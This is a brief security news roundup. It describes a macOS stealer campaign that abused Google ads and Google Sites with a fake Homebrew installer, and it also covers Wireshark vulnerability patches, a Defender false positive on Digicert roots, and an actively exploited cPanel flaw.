Mac Sync Stealer Malware Campaign Exploits Google Ecosystem and Multiple Security Updates

On May 4, 2026, the SANS Internet Storm Center reported on a Mac Sync Stealer malware campaign exploiting Google's ecosystem, including paid ads and Google Pages infrastructure. The attack begins with malicious ads for "HomePro" (a misspelling of Homebrew) hosted on business.google.com, leading victims to a fake installer page on sites.google.com. The installer prompts users to paste a Base64-encoded shell script into their terminal, which downloads additional tools and malware, bypassing some macOS security warnings. Wireshark 4.6.5 was released, patching 43 vulnerabilities discovered via AI tools, some enabling code execution, while also updating its UI to include a donation prompt. Microsoft Defender for Endpoint incorrectly flagged Digicert's root authority certificates as malicious after Digicert reported a compromise where 60 fraudulent certificates were issued and later revoked. A widely exploited vulnerability in cPanel was also highlighted, with patches available, urging administrators to verify auto-updates due to active exploitation.